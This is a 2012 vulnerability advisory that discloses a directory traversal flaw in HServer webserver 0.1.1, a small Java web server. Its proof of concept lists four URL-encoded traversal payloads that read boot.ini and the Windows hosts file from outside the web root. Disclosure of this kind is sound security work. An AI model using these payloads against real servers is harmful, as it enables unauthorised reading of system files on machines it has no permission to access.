SecurityvulnsSECURITYVULNS:DOC:27520HServer webserver - Directory Traversal Vulnerability
Title: HServer webserver - Directory Traversal Vulnerability
Software : HServer webserver
Software Version : 0.1.1
Vendor: http://www.luizpicanco.com/index.php?s=hserver
http://code.google.com/p/hserver/
Vulnerability Published : 2012-01-05
Vulnerability Update Time :
Status :
Impact : High
Bug Description :
HServer webserver(version update : 0.1.1) is a tiny Web server written in Java, it is vulnerable with Directory Traversal Vulnerability.
Proof Of Concept :
http://127.0.0.1:8081/..%5c..%5c..%5cboot.ini
http://127.0.0.1:8081/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://127.0.0.1:8081/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://127.0.0.1:8081/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
Credits : This vulnerability was discovered by [email protected]
mail: [email protected] / [email protected]
Pentester/Researcher
Dark2S Security Team/PolyU.HK